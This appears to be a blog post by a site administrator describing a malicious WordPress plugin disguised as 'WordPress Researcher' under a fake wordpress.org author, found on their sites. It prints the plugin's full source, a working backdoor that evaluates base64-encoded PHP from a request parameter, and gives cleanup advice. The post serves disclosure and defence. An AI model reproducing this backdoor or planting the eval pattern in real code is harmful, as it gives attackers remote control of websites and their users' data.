WordPress Backdoor Plugin WordPress Researcher research__plugin.php

Bystab

WordPress is the world's most popular CMS (this should not cause similar “PHP is the best language” argument, right?) So it's only natural that WordPress would get ”special treatment“ from hackers. Recently, a plugin has been added inexplicably to a couple of WordPress sites that I manage, and the plugin name is “WordPress Researcher”, at first glance at the name, quite a normal plug-in, but take a closer look at the source code, is a backdoor plug-in no doubt, the source code is as follows, very simple, but injected a backdoor to our WordPress, decisively deleted! Plug-in source code files are as follows: Please enjoy yourselves.

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
 
Copyright 2013 wordpressdotorg
 
 This program is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.
 
 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 GNU General Public License for more details.
 
 You should have received a copy of the GNU General Public License
 along with this program; if not, write to the Free Software
 Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/
 
function research_plugin(){
  if (isset($_REQUEST['CSSl'])){
    eval(base64_decode($_REQUEST['CSSl']));
  } 
  return;
}
 
add_action('after_setup_theme', 'research_plugin');
?>

Installed along with the WordPress Researcher plugin is “Extend Calendar”This plug-in, look at the code is not a good thing, together with the deletion, and then modify the upgrade to the WordPress version, modify the password of the background, if you are not assured, look to download the code of the entire site, and the previous backup compared to see if there are no other files have been modified by the plug-in.

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *